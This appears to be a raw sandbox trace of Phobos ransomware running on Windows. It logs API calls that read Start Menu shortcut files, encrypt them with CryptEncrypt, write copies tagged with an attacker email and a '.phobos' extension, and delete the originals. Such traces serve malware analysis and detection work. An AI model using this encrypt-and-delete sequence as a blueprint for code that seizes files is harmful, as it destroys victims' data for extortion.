menu\\programs\\accessories\\paint.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.436] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.436] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.436] ReadFile (in: hFile=0x158, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4da, lpOverlapped=0x0) returned 1 [0176.438] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4e0, dwBufLen=0x4e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4e0) returned 1 [0176.438] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4e0, lpOverlapped=0x0) returned 1 [0176.439] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.439] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.439] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0176.439] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.439] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0176.439] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.439] CloseHandle (hObject=0x158) returned 1 [0176.439] CloseHandle (hObject=0x194) returned 1 [0176.440] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Paint.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\paint.lnk")) returned 1 [0176.441] SetEvent (hEvent=0xe8) returned 1 [0176.442] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.442] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\remote desktop connection.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.442] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1367) returned 1 [0176.443] CloseHandle (hObject=0x194) returned 1 [0176.443] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\remote desktop connection.lnk")) returned 0x20 [0176.443] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\remote desktop connection.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.443] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\remote desktop connection.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.443] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.443] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.443] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\remote desktop connection.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.445] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.445] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.445] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x557, lpOverlapped=0x0) returned 1 [0176.517] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x560, dwBufLen=0x560 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x560) returned 1 [0176.517] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x560, lpOverlapped=0x0) returned 1 [0176.518] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.518] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.518] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0176.518] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.518] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0176.519] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.519] CloseHandle (hObject=0x194) returned 1 [0176.519] CloseHandle (hObject=0x158) returned 1 [0176.519] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Remote Desktop Connection.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\remote desktop connection.lnk")) returned 1 [0176.520] SetEvent (hEvent=0xe8) returned 1 [0176.521] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\character map.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.521] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1248) returned 1 [0176.521] CloseHandle (hObject=0x158) returned 1 [0176.521] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\character map.lnk")) returned 0x20 [0176.521] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\character map.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\character map.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.521] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.521] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.522] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\character map.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.522] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.522] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.522] ReadFile (in: hFile=0x158, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4e0, lpOverlapped=0x0) returned 1 [0176.524] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0, dwBufLen=0x4f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0) returned 1 [0176.524] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4f0, lpOverlapped=0x0) returned 1 [0176.525] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.525] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.525] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.525] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.525] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.525] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.525] CloseHandle (hObject=0x158) returned 1 [0176.525] CloseHandle (hObject=0x194) returned 1 [0176.525] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Character Map.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\character map.lnk")) returned 1 [0176.527] SetEvent (hEvent=0xe8) returned 1 [0176.527] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.527] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\dfrgui.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.527] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1290) returned 1 [0176.527] CloseHandle (hObject=0x194) returned 1 [0176.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\dfrgui.lnk")) returned 0x20 [0176.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\dfrgui.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.528] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\dfrgui.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.528] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.528] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.528] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\dfrgui.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.528] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.528] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.528] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x50a, lpOverlapped=0x0) returned 1 [0176.540] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x510, dwBufLen=0x510 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x510) returned 1 [0176.540] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x510, lpOverlapped=0x0) returned 1 [0176.541] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32968) returned 1 [0176.541] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.541] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0176.541] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.541] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0176.541] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.541] CloseHandle (hObject=0x194) returned 1 [0176.541] CloseHandle (hObject=0x158) returned 1 [0176.542] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\dfrgui.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\dfrgui.lnk")) returned 1 [0176.543] SetEvent (hEvent=0xe8) returned 1 [0176.544] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.544] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\disk cleanup.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.544] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1252) returned 1 [0176.544] CloseHandle (hObject=0x158) returned 1 [0176.544] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\disk cleanup.lnk")) returned 0x20 [0176.544] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\disk cleanup.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.544] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\disk cleanup.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.544] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.544] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.545] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\disk cleanup.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.545] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.545] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.545] ReadFile (in: hFile=0x158, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4e4, lpOverlapped=0x0) returned 1 [0176.560] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0, dwBufLen=0x4f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4f0) returned 1 [0176.560] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4f0, lpOverlapped=0x0) returned 1 [0176.563] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d68) returned 1 [0176.564] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.564] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0176.564] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.564] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0176.565] CryptDestroyKey (hKey=0xa32c68) returned 1 [0176.565] CloseHandle (hObject=0x158) returned 1 [0176.565] CloseHandle (hObject=0x194) returned 1 [0176.565] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Disk Cleanup.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\disk cleanup.lnk")) returned 1 [0176.567] SetEvent (hEvent=0xe8) returned 1 [0176.568] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.568] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\resource monitor.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.568] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1242) returned 1 [0176.568] CloseHandle (hObject=0x194) returned 1 [0176.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\resource monitor.lnk")) returned 0x20 [0176.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\resource monitor.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.568] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\resource monitor.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.569] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.569] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.569] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Resource Monitor.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\accessories\\system tools\\resource monitor.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0176.569] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32c68) returned 1 [0176.569] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.569] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4da, lpOverlapped=0x0) returned 1 [0176.627] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4e0, dwBufLen=0x4e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x4e0) returned 1 [0176.627] WriteFile (in: hFile=0x158, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x4e0, lpOverlapped=0x0) returned 1 [0176.628] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, 